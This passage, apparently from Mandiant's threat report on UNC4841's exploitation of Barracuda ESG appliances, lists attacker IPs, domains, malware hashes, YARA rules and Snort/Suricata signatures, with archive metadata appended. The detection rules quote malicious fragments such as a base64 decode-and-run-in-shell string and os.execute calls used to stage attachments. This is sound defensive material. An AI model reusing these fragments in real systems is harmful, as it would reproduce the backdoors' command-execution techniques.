analysis.\r\nPhysical appliance models can be imaged following standard procedures. Most models have two (2)\r\nhot-swappable drives in a RAID1 configuration. \r\nThe provided YARA rules can be applied to appliance images to assist forensic investigators. \r\nIn order to aid organizations in their investigations, Mandiant has published a compilation of IOCs observed to\r\ndate which can be found at the end of the post.\r\nAlong with this blog post, Mandiant has produced a detailed Architecture Hardening guide to assist organizations\r\nwith this event. The document contains guidance on the following key items:\r\nNetwork Communication Restrictions\r\nPatching and Updates\r\nCredential Rotation and Segmentation\r\nLogging and Hunting\r\nInfrastructure Lateral Movement Hardening\r\nAcknowledgements\r\nBeyond the listed authors are dozens of consultants and analysts who have been working to help our clients with\r\ncases related to exploitation of CVE-2023-2868. We would also like to specifically thank Barracuda’s Incident\r\nResponse Team, the Mandiant FLARE team, Jakub Jozwiak from Mandiant Adversary Methods as well as\r\nFernando Tomlinson, Josh Villanueva, and Alyssa Glickman from Mandiant Incident Response for their\r\ninvaluable support.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 17 of 34\n\nIndicators of Compromise (IOCs)\r\nNetwork IOCs\r\nIP Address ASN Netblock Location\r\n101.229.146.218 4812 China Telecom CN\r\n103.146.179.101 136933 Gigabitbank Global HK\r\n103.27.108.62 132883 Topway Global Limited HK\r\n103.77.192.13 10222 Multibyte Info Technology Limited HK\r\n103.77.192.88 10222 Multibyte Info Technology Limited HK\r\n103.93.78.142 61414 Edgenap Ltd JP\r\n104.156.229.226 20473 Choopa, LLC US\r\n104.223.20.222 8100 CloudVPS US\r\n107.148.149.156 399195 Pegtechinc-ap-04 US\r\n107.148.219.227 54600 Peg Tech US\r\n107.148.219.53 54600 Peg Tech US\r\n107.148.219.54 54600 Peg Tech US\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 18 of 34\n\n107.148.219.55 54600 Peg Tech US\r\n107.148.223.196 54600 Peg Tech US\r\n107.173.62.158 20278 Nexeon Technologies US\r\n137.175.19.25 54600 Peg Tech US\r\n137.175.28.251 54600 Peg Tech US\r\n137.175.30.36 54600 Peg Tech US\r\n137.175.30.86 54600 Peg Tech US\r\n137.175.51.147 54600 Peg Tech US\r\n137.175.53.17 54600 Peg Tech US\r\n137.175.53.170 54600 Peg Tech US\r\n137.175.53.218 54600 Peg Tech US\r\n137.175.60.252 54600 Peg Tech US\r\n137.175.60.253 54600 Peg Tech US\r\n137.175.78.66 54600 Peg Tech US\r\n139.84.227.9 20473 Choopa, LLC ZA\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 19 of 34\n\n155.94.160.72 8100 CloudVPS US\r\n182.239.114.135 9231 China Mobile Hong Kong HK\r\n182.239.114.254 9231 China Mobile Hong Kong HK\r\n192.74.226.142 54600 Peg Tech CN\r\n192.74.254.229 54600 Peg Tech US\r\n198.2.254.219 54600 Peg Tech US\r\n198.2.254.220 54600 Peg Tech US\r\n198.2.254.221 54600 Peg Tech US\r\n198.2.254.222 54600 Peg Tech US\r\n198.2.254.223 54600 Peg Tech US\r\n199.247.23.80 20473 Choopa, LLC DE\r\n213.156.153.34 202422 G-Core Labs S.A. US\r\n216.238.112.82 20473 Choopa, LLC BR\r\n23.224.42.29 40065 Cnservers LLC US\r\n23.224.78.130 40065 Cnservers LLC US\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 20 of 34\n\n23.224.78.131 40065 Cnservers LLC US\r\n23.224.78.132 40065 Cnservers LLC US\r\n23.224.78.133 40065 Cnservers LLC US\r\n23.224.78.134 40065 Cnservers LLC US\r\n37.9.35.217 202422 G-Core Labs S.A. US\r\n38.54.113.205 138915 Kaopu Cloud HK Limited MY\r\n38.54.1.82 138915 Kaopu Cloud HK Limited SG\r\n38.60.254.165 174 Cogent Communications US\r\n45.63.76.67 20473 Choopa, LLC US\r\n52.23.241.105 14618 Amazon.com US\r\n64.176.4.234 20473 Choopa, LLC US\r\n64.176.7.59 20473 Choopa, LLC US\r\nDomain\r\nbestfindthetruth[.]com\r\nfessionalwork[.]com\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 21 of 34\n\ngesturefavour[.]com\r\ngoldenunder[.]com\r\nsingamofing[.]com\r\nsingnode[.]com\r\ntogetheroffway[.]com\r\ntroublendsef[.]com\r\nEndpoint IOCs\r\nHash Filename Type\r\n0d67f50a0bf7a3a017784146ac41ada0 snapshot.tar Payload Attachment\r\n42722b7d04f58dcb8bd80fe41c7ea09e 11111.tar Payload Attachment\r\n5392fb400bd671d4b185fb35a9b23fd3 imgdata.jpg Payload Attachment\r\nac4fb6d0bfc871be6f68bfa647fc0125 snapshot.tar Payload Attachment\r\n878cf1de91f3ae543fd290c31adcbda4 snapshot.tar Payload Attachment\r\nb601fce4181b275954e3f35b18996c92 install_reuse.tar SALTWATER install\r\n827d507aa3bde0ef903ca5dec60cdec8 mod_udp.so SALTWATER variant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 22 of 34\n\nc56d7b86e59c5c737ee7537d7cf13df1 autoins SALTWATER install\r\n6f79ef58b354fd33824c96625590c244 intent_reuse SALTWATER install\r\n349ca242bc6d2652d84146f5f91c3dbb intentbas SALTWATER install\r\n1fea55b7c9d13d822a64b2370d015da7 mod_udp.so SALTWATER variant\r\n64c690f175a2d2fe38d3d7c0d0ddbb6e mod_udp.so SALTWATER variant\r\n4cd0f3219e98ac2e9021b06af70ed643 mod_udp.so SALTWATER variant\r\n3b93b524db66f8bb3df8279a141734bb mod_rtf.so SALTWATER variant\r\n8fdf3b7dc6d88594b8b5173c1aa2bc82 mod_rft.so SALTWATER Variant\r\n4ec4ceda84c580054f191caa09916c68 mod_rft.so SALTWATER variant\r\n1b1830abaf95bd5a44aa3873df901f28 mod_rft.so SALTWATER variant\r\n4ca4f582418b2cc0626700511a6315c0 BarracudaMailService SEASPY Variant\r\nc528b6398c86f8bdcfa3f9de7837ebfe update_v2.sh SEASPY Install\r\n2d841cb153bebcfdee5c54472b017af2 rc SEASPY launcher\r\nc979e8651c1f40d685be2f66e8c2c610 rc SEASPY launcher\r\n1c042d39ca093b0e7f1412453b132076 rc SEASPY launcher\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 23 of 34\n\nba7af4f98d85e5847c08cf6cefdf35dc rc SEASPY launcher\r\n82eaf69de710abdc5dea7cd5cb56cf04 BarracudaMailService SEASPY Variant\r\ne80a85250263d58cc1a1dc39d6cf3942 BarracudaMailService SEASPY Variant\r\n5d6cba7909980a7b424b133fbac634ac BarracudaMailService SEASPY Variant\r\n1bbb32610599d70397adfdaf56109ff3 BarracudaMailService SEASPY Variant\r\n4b511567cfa8dbaa32e11baf3268f074 BarracudaMailService SEASPY Variant\r\na08a99e5224e1baf569fda816c991045 BarracudaMailService SEASPY Variant\r\n19ebfe05040a8508467f9415c8378f32 BarracudaMailService SEASPY Variant\r\n831d41ba2a0036540536c2f884d089f9 sendscd SEASPY Variant\r\ndb4c48921537d67635bb210a9cb5bb52 BarracudaMailService SEASPY Variant\r\n694cdb49879f1321abb4605adf634935 install_bvp74_auth.tar SEASPY install\r\n5fdee67c82f5480edfa54afc5a9dc834 install_bvp74_auth.tar SEASPY install\r\n8fc03800c1179a18fbd58d746596fa7d update_version SEASPY launcher\r\n17696a438387248a12cc911fbae8620e resize_risertab SEASPY launcher\r\n4c1c2db989e0e881232c7748593d291e update_version SEASPY launcher\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 24 of 34\n\n3e3f72f99062255d6320d5e686f0e212 update_version SEASPY launcher\r\n7d7fd05b262342a9e8237ce14ec41c3b update_version SEASPY launcher\r\n2e30520f8536a27dd59eabbcb8e3532a update_version SEASPY launcher\r\n0245e7f9105253ecb30de301842e28e4 update_version SEASPY launcher\r\n0c227990210e7e9d704c165abd76ebe2 update_version SEASPY launcher\r\nc7a89a215e74104682880def469d4758 update_version SEASPY launcher\r\n1bc5212a856f028747c062b66c3a722a update_version SEASPY launcher\r\na45ca19435c2976a29300128dc410fd4 update_version SEASPY launcher\r\n132a342273cd469a34938044e8f62482 update_version SEASPY launcher\r\n23f4f604f1a05c4abf2ac02f976b746b resize2fstab SEASPY Variant\r\n45b79949276c9cb9cf5dc72597dc1006 resize_reisertab SEASPY Variant\r\nbef722484288e24258dd33922b1a7148 resize2fstab SEASPY Variant\r\n0805b523120cc2da3f71e5606255d29c resize_reisertab SEASPY Variant\r\n69ef9a9e8d0506d957248e983d22b0d5 resize2fstab SEASPY Variant\r\n3c20617f089fe5cc9ba12c43c6c072f5 resize2fstab SEASPY Variant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 25 of 34\n\n76811232ede58de2faf6aca8395f8427 resize2fstab SEASPY Variant\r\nf6857841a255b3b4e4eded7a66438696 resize_reisertab SEASPY Variant\r\n2ccb9759800154de817bf779a52d48f8 install_helo.tar SEASIDE Install\r\ncd2813f0260d63ad5adf0446253c2172 mod_require_helo.lua SEASIDE variant\r\n177add288b289d43236d2dba33e65956 rverify WHIRLPOOL VARIANT\r\n87847445f9524671022d70f2a812728f mod_content.lua SKIPJACK\r\n35cf6faf442d325961935f660e2ab5a0 mod_attachment.lua SEASPRAY\r\nce67bb99bc1e26f6cb1f968bc1b1ec21 install_att_v2.tar SEASPRAY install\r\ne4e86c273a2b67a605f5d4686783e0cc mknod SKIPJACK Persistence\r\nad1dc51a66201689d442499f70b78dea get_fs_info.pl SKIPJACK Persistence\r\n9033dc5bac76542b9b752064a56c6ee4 nfsd_stub.ko SANDBAR\r\ne52871d82de01b7e7f134c776703f696 rverify WHIRLPOOL Variant\r\n446f3d71591afa37bbd604e2e400ae8b mknod SEASPRAY Persistence\r\n666da297066a2596cacb13b3da9572bf mod_sender.lua SEASPRAY\r\n436587bad5e061a7e594f9971d89c468 saslautchd WHIRLPOOL Variant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 26 of 34\n\n85c5b6c408e4bdb87da6764a75008adf rverify WHIRLPOOL Variant\r\n407738e565b4e9dafb07b782ebcf46b0 test1.sh Reverse shell cronjob\r\ncb0f7f216e8965f40a724bc15db7510b update_v35.sh Bash Script\r\nN/A - multiple version identified 1.sh Bash Script\r\n19e373b13297de1783cecf856dc48eb0 cl proxy client\r\nN/A aacore.sh reverse shell cronjob\r\nN/A appcheck.sh reverse shell cronjob\r\n881b7846f8384c12c7481b23011d8e45 update_v31.sh Bash Script\r\nf5ab04a920302931a8bd063f27b745cc intent_helo Bash Script\r\nN/A p Named pipe used in reverse shell\r\nN/A p7 Named pipe used in reverse shell\r\nN/A t Named pipe used in reverse shell\r\nN/A core.sh Reverse shell cronjob\r\nN/A p1 Named pipe used in reverse shell\r\n177add288b289d43236d2dba33e65956 pd WHIRLPOOL Variant\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 27 of 34\n\nN/A b  Named pipe used in reverse shell\r\nd098fe9674b6b4cb540699c5eb452cb5 test.sh Reverse shell cronjob\r\nN/A ss Named pipe used in reverse shell\r\nDetection Rules\r\nYARA Rules\r\nrule M_Hunting_Exploit_Archive_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for TAR archives with /tmp/ base64 encoded being part of filename of\r\n md5 = \"0d67f50a0bf7a3a017784146ac41ada0\"\r\n strings:\r\n $ustar = { 75 73 74 61 72 }\r\n $b64_tmp = \"/tmp/\" base64\r\n condition:\r\n filesize \u003c 1MB and\r\n $ustar at 257 and\r\n for any i in (0 .. #ustar) : (\r\n $b64_tmp in (i * 512 .. i * 512 + 250)\r\n )\r\n}\r\nrule M_Hunting_Exploit_Archive_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for TAR archive with openssl base64 encoded being part of filename o\r\n md5 = \"0d67f50a0bf7a3a017784146ac41ada0\"\r\n strings:\r\n $ustar = { 75 73 74 61 72 }\r\n $b64_openssl = \"openssl\" base64\r\n condition:\r\n filesize \u003c 1MB and\r\n $ustar at 257 and\r\n for any i in (0 .. #ustar) : (\r\n $b64_openssl in (i * 512 .. i * 512 + 250)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 28 of 34\n\n)\r\n}\r\nrule M_Hunting_Exploit_Archive_CVE_2023_2868\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for TAR archive with single quote/backtick as start of filename of e\r\n md5 = \"0d67f50a0bf7a3a017784146ac41ada0\"\r\n strings:\r\n $ustar = { 75 73 74 61 72 }\r\n $qb = \"'`\"\r\n condition:\r\n filesize \u003c 1MB and\r\n $ustar at 257 and\r\n for any i in (0 .. #ustar) : (\r\n $qb at (@ustar[i] + 255)\r\n )\r\n}\r\nrule M_Hunting_Linux_SALTWATER_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SALTWATER samples.\"\r\n md5 = \"827d507aa3bde0ef903ca5dec60cdec8\"\r\n strings:\r\n $s1 = { 71 75 69 74 0D 0A 00 00 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78\r\n $s2 = { 00 8B D5 AD 93 B7 54 D5 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78\r\n $s3 = { 71 75 69 74 0D 0A 00 00 00 12 8D 03 07 9C 17 92 08 F0 0C 9A 01 06 08 00 1A 0C 0B 8D 18 0A 0D 0A\r\n condition:\r\n uint32(0) == 0x464c457f and any of them\r\n}\r\nrule M_Hunting_Linux_SALTWATER_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SALTWATER samples.\"\r\n md5 = \"827d507aa3bde0ef903ca5dec60cdec8\"\r\n strings:\r\n $c1 = \"TunnelArgs\"\r\n $c2 = \"DownloadChannel\"\r\n $c3 = \"UploadChannel\"\r\n $c4 = \"ProxyChannel\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 29 of 34\n\n$c5 = \"ShellChannel\"\r\n $c6 = \"MyWriteAll\"\r\n $c7 = \"MyReadAll\"\r\n $c8 = \"Connected2Vps\"\r\n $c9 = \"CheckRemoteIp\"\r\n $c10 = \"GetFileSize\"\r\n $s1 = \"[-] error: popen failed\"\r\n $s2 = \"/home/product/code/config/ssl_engine_cert.pem\"\r\n $s3 = \"libbindshell.so\"\r\n condition:\r\n uint32(0) == 0x464c457f and (any of ($s*) or 4 of ($c*))\r\n}\r\nrule FE_Hunting_Linux_Funchook_FEBeta\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in Funchook library - https://github.com/kubo/f\r\n md5 = \"827d507aa3bde0ef903ca5dec60cdec8\"\r\n strings:\r\n $f = \"funchook_\"\r\n $s1 = \"Enter funchook_create()\"\r\n $s2 = \"Leave funchook_create() =\u003e %p\"\r\n $s3 = \"Enter funchook_prepare(%p, %p, %p)\"\r\n $s4 = \"Leave funchook_prepare(..., [%p-\u003e%p],...) =\u003e %d\"\r\n $s5 = \"Enter funchook_install(%p, 0x%x)\"\r\n $s6 = \"Leave funchook_install() =\u003e %d\"\r\n $s7 = \"Enter funchook_uninstall(%p, 0x%x)\"\r\n $s8 = \"Leave funchook_uninstall() =\u003e %d\"\r\n $s9 = \"Enter funchook_destroy(%p)\"\r\n $s10 = \"Leave funchook_destroy() =\u003e %d\"\r\n $s11 = \"Could not modify already-installed funchook handle.\"\r\n $s12 = \" change %s address from %p to %p\"\r\n $s13 = \" link_map addr=%p, name=%s\"\r\n $s14 = \" ELF type is neither ET_EXEC nor ET_DYN.\"\r\n $s15 = \" not a valid ELF module %s.\"\r\n $s16 = \"Failed to protect memory %p (size=%\"\r\n $s17 = \" protect memory %p (size=%\"\r\n $s18 = \"Failed to unprotect memory %p (size=%\"\r\n $s19 = \" unprotect memory %p (size=%\"\r\n $s20 = \"Failed to unprotect page %p (size=%\"\r\n $s21 = \" unprotect page %p (size=%\"\r\n $s22 = \"Failed to protect page %p (size=%\"\r\n $s23 = \" protect page %p (size=%\"\r\n $s24 = \"Failed to deallocate page %p (size=%\"\r\n $s25 = \" deallocate page %p (size=%\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 30 of 34\n\n$s26 = \" allocate page %p (size=%\"\r\n $s27 = \" try to allocate %p but %p (size=%\"\r\n $s28 = \" allocate page %p (size=%\"\r\n $s29 = \"Could not find a free region near %p\"\r\n $s30 = \" -- Use address %p or %p for function %p\"\r\n condition:\r\n uint32(0) == 0x464c457f and (#f \u003e 5 or 4 of ($s*))\r\n}\r\nrule M_Hunting_Linux_SEASPY_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SEASPY samples.\"\r\n md5 = \"4ca4f582418b2cc0626700511a6315c0\"\r\n strings:\r\n $s1 = \"usage: ./BarracudaMailService \u003cNetwork-Interface\u003e. e.g.: ./BarracudaMailService eth0\"\r\n $s2 = \"NO port code\"\r\n $s3 = \"pcap_lookupnet: %s\"\r\n $s4 = \"Child process id:%d\"\r\n $s5 = \"[*]Success!\"\r\n $s6 = \"enter open tty shell...\"\r\n condition:\r\n uint32(0) == 0x464c457f and all of ($s*)\r\n}\r\nrule M_Hunting_Lua_SEASIDE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SEASIDE samples.\"\r\n md5 = \"cd2813f0260d63ad5adf0446253c2172\"\r\n strings:\r\n $s1 = \"function on_helo()\"\r\n $s2 = \"local bindex,eindex = string.find(helo,'.onion')\"\r\n $s3 = \"helosend = 'pd'..' '..helosend\"\r\n $s4 = \"os.execute(helosend)\"\r\n condition:\r\n (filesize \u003c 1MB) and all of ($s*)\r\n}\r\nrule M_Hunting_SKIPJACK_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 31 of 34\n\ndescription = \"Hunting rule looking for strings observed in SKIPJACK installation script.\"\r\n md5 = \"e4e86c273a2b67a605f5d4686783e0cc\"\r\n strings:\r\n $str1 = \"hdr:name() == 'Content-ID'\" base64\r\n $str2 = \"hdr:body() ~= nil\" base64\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\" base64\r\n $str4 = \"openssl aes-256-cbc\" base64\r\n $str5 = \"mod_content.lua\"\r\n $str6 = \"#!/bin/sh\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Hunting_Lua_SKIPJACK_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SKIPJACK samples.\"\r\n md5 = \"87847445f9524671022d70f2a812728f\"\r\n strings:\r\n $str1 = \"hdr:name() == 'Content-ID'\"\r\n $str2 = \"hdr:body() ~= nil\"\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\"\r\n $str4 = \"openssl aes-256-cbc\"\r\n $str5 = \"| base64 -d| sh 2\u003e\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Hunting_Lua_SEASPRAY_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SEASPRAY samples.\"\r\n md5 = \"35cf6faf442d325961935f660e2ab5a0\"\r\n strings:\r\n $str1 = \"string.find(attachment:filename(),'obt075') ~= nil\"\r\n $str2 = \"os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())\"\r\n $str3 = \"os.execute('rverify'..' /tmp/'..attachment:filename())\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Hunting_Linux_WHIRLPOOL_1\r\n{\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 32 of 34\n\nmeta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in WHIRLPOOL samples.\"\r\n md5 = \"177add288b289d43236d2dba33e65956\"\r\n strings:\r\n $s1 = \"error -1 exit\" fullword\r\n $s2 = \"create socket error: %s(error: %d)\\n\" fullword\r\n $s3 = \"connect error: %s(error: %d)\\n\" fullword\r\n $s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}\r\n $c1 = \"plain_connect\" fullword\r\n $c2 = \"ssl_connect\" fullword\r\n $c3 = \"SSLShell.c\" fullword\r\n condition:\r\n filesize \u003c 15MB and uint32(0) == 0x464c457f and (all of ($s*) or all of ($c*))\r\n}\r\nSnort/Suricata\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_oXmp\"; flags:S; dsize:\u003e9;\r\ncontent:\"oXmp\"; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000;\r\nrev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_TfuZ\"; flags:S; dsize:\u003e9;\r\ncontent:\"TfuZ\"; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001;\r\nrev:1;)\r\nSuricata \u003e= 5.0.4\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_1358\"; flags:S; tcp.hdr; content:\"|05\r\n4e|\"; offset:22; depth:2; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_58928\"; flags:S; tcp.hdr; content:\"|e6\r\n30|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; threshold:type limit,track by_src,count\r\n1,seconds 3600; sid:1000003; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_58930\"; flags:S; tcp.hdr; content:\"|e6\r\n32|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; byte_test:2,\u003e,0,0,big,relative;\r\nthreshold:type limit,track by_src,count 1,seconds 3600; sid:1000004; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_60826\"; flags:S; tcp.hdr; content:\"|ed\r\n9a|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; threshold:type limit,track by_src,count\r\n1,seconds 3600; sid:1000005; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_60828\"; flags:S; tcp.hdr; content:\"|ed\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 33 of 34\n\n9c|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; byte_test:2,\u003e,0,0,big,relative;\r\nthreshold:type limit,track by_src,count 1,seconds 3600; sid:1000006; rev:1;)\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA106-463 Command and Control - UNC4841, DNS Query, Variant #1\r\nA106-464 Malicious File Transfer - SALTWATER, Download, Variant #1\r\nA106-465 Malicious File Transfer - SEASPY, Download, Variant #1\r\nA106-466 Malicious File Transfer - SEASIDE, Download, Variant #1\r\nA106-506 Phishing Email - UNC4841, CVE-2023-2868, Malicious Attachment, Variant #1\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/\r\nPage 34 of 34\n\nhttps://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/  \nba7af4f98d85e5847c08cf6cefdf35dc rc SEASPY launcher\n82eaf69de710abdc5dea7cd5cb56cf04 BarracudaMailService SEASPY Variant\ne80a85250263d58cc1a1dc39d6cf3942 BarracudaMailService SEASPY Variant\n5d6cba7909980a7b424b133fbac634ac BarracudaMailService SEASPY Variant\n1bbb32610599d70397adfdaf56109ff3 BarracudaMailService SEASPY Variant\n4b511567cfa8dbaa32e11baf3268f074 BarracudaMailService SEASPY Variant\na08a99e5224e1baf569fda816c991045 BarracudaMailService SEASPY Variant\n19ebfe05040a8508467f9415c8378f32 BarracudaMailService SEASPY Variant\n831d41ba2a0036540536c2f884d089f9 sendscd SEASPY Variant\ndb4c48921537d67635bb210a9cb5bb52 BarracudaMailService SEASPY Variant\n694cdb49879f1321abb4605adf634935 install_bvp74_auth.tar SEASPY install\n5fdee67c82f5480edfa54afc5a9dc834 install_bvp74_auth.tar SEASPY install\n8fc03800c1179a18fbd58d746596fa7d update_version SEASPY launcher\n17696a438387248a12cc911fbae8620e resize_risertab SEASPY launcher\n4c1c2db989e0e881232c7748593d291e update_version SEASPY launcher\n Page 24 of 34",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/"
	],
	"report_names": [
		"barracuda-esg-exploited-globally"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2c3c22a-b3db-4d4a-9a5a-76bfe6171843",
			"created_at": "2023-11-21T02:00:07.315543Z",
			"updated_at": "2026-04-10T02:00:03.461446Z",
			"deleted_at": null,
			"main_name": "UNC4841",
			"aliases": [
				"SLIME57"
			],
			"source_name": "MISPGALAXY:UNC4841",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434050,
	"ts_updated_at": 1775791502,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3123c17f4af5bb8c4bb995066e9f0478cd6eb24e.pdf",
		"text": "https://archive.orkl.eu/3123c17f4af5bb8c4bb995066e9f0478cd6eb24e.txt",
		"img": "https://archive.orkl.eu/3123c17f4af5bb8c4bb995066e9f0478cd6eb24e.jpg"
	}
}